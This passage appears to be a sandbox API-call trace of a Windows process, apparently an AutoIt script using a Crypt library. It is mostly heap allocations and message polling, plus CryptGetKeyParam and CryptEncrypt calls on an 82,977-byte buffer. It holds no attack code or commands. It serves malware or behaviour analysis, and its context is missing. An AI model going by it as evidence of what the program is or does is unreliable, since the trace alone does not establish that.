out: hHeap=0x8a0000) returned 1 [0188.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.194] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0188.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0188.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0188.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0188.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0188.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0188.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0188.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.194] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.194] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0188.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0188.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0188.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0188.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0188.195] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0188.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0188.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0188.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0188.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0188.195] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.195] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.195] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0188.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0188.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0188.196] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0188.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0188.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0188.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0188.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0188.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0188.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0188.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0188.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0188.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0188.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0188.196] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0188.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0188.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0188.197] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0188.197] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0188.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0188.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0188.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0188.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0188.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0188.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0188.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0188.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0188.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0188.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0188.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0188.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0188.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0188.198] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0188.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0188.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0188.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0188.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0188.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0188.198] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0188.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0188.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0188.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0188.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0188.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0188.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0188.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0188.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0188.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0188.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0188.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0188.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0188.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0188.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0188.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.199] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.199] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c26c8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c26c8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0188.199] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.200] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0188.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0188.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.200] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.200] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0188.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0188.200] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.200] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0188.200] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.200] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0188.207] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.207] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0188.207] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.207] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0188.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0188.207] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.207] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.207] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.207] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0188.207] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.207] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0188.207] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.208] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.208] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x14415, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x14420) returned 1 [0188.208] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.208] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0188.208] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.208] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.208] CharLowerBuffW (in: lpsz="byte[82977]", cchLength=0xb | out: lpsz="byte[82977]") returned 0xb [0188.208] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.210] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.210] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0188.210] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.213] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.213] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa87848*, pdwDataLen=0x87e820*=0x14415, dwBufLen=0x14420 | out: pbData=0xa87848*, pdwDataLen=0x87e820*=0x14420) returned 1 [0188.213] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.213] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0188.214] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.218] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.218] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.218] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.218] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0188.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.218] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.218] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0188.218] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.218] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0188.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 